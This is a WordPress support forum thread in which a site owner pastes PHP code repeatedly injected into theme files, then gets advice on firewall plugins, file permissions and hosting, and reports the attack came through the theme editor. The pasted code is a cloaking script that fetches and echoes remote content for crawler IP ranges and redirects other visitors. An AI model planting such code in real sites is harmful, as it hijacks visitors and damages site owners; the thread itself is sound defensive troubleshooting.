Support » Fixing WordPress » Theme files keep getting injected with viral script

  • Hi there,

    I am pretty much stumped. One of my clients runs a WordPress blog and no matter what I do, I can’t keep it from getting hacked. I’ve updated all the plugins, deleted all unnecessary looking files from the server, he changes his FTP password once a week, yet he still keeps getting his files modified.

    It only happens in the theme folder, to either the index.php, header.php or footer.php files. This is the typical code that gets inserted:

    if ( !getenv("HTTP_COOKIE") && preg_match( "/^abstract=(.+)/", getenv("QUERY_STRING"), $m) ) { $qs_kw = $m[1]; 
    preg_match("/([0-9]+).([0-9]+).([0-9]+).([0-9]+)/", getenv("REMOTE_ADDR"), $arr);
     $a = $arr[1]; $b = $arr[2];
    $lst = ',38100,189221,61135,220181,174132,66230,7455,66102,20880,20383,97116,89122,3899,66232,19347,66231,66228,66212,61247,67195,86,72240,7214,74125,66249,6468,64233,21633,216239,20985,209185,202212,202160,203141,216109,216239,21632,6475,66163,66196,66228,6694,68142,7230,69147,6555,746,208111,6428,';
     if ( preg_match( "/,$a$b,/", $lst) ) {$remfl = implode('', file ("$qs_kw&pl=207&mt=r")); echo $remfl; exit;} 
     else { $rf = getenv("HTTP_REFERER");
    echo "<script>document.location=''+escape('$qs_kw')+'&fn='+escape(location.href)+'&dr='+escape('$rf')</script>"; exit;
    } }

    I’m wondering if it has to do with certain settings in his php.ini that I’m not catching. Anyone have any ideas?

Viewing 8 replies - 1 through 8 (of 8 total)
  • I don’t know but maybye using some security plugins would prevent the hacking. WP-Firewall (free-google it) , askapache password protect, login lockdown, etc.


    Make sure that theme and plugin which you have installed on your blog are not vulnerable and compatible to your host and blog configuration…

    Assign recursively 644 permissions to the theme directory of your blog..


    Shane G.

    I tried making the permission to the themes directory 644, but the CSS and images will not load unless the permissions are 755. Could that be the problem?

    How can I tell if a theme is vulnerable?

    Just FYI in case anyone has the same problem:

    I downloaded the WordPress Firewall as suggested by TransPersonal from and it works amazingly well. The site was getting “WordPress-Specific SQL Injection Attacks” and the firewall blocked them. Thanks!!!

    Hi lovablechelsey,

    I’m in a similar boat with you. My site was also attacked with a script mentioned here by another member:

    Read the members last post in that thread. The member stated that the script was hiding on their hosts server, and until it was deleted from the server it resurfaced on that persons blog. Hope that might help, if the seoegghead doesn’t fix your challenge.



    Forum Moderator

    Who is the site hosted with? If it’s on a shared server, the weak link could be another site on the same server. Have you spoken to the hosting provider?

    The WordPress Firewall showed that the attacked was being made through wp-admin/theme-editor.php, so once I changed the wordpress administrator’s password there have been no more attempts. Phew!

Viewing 8 replies - 1 through 8 (of 8 total)
  • The topic ‘Theme files keep getting injected with viral script’ is closed to new replies.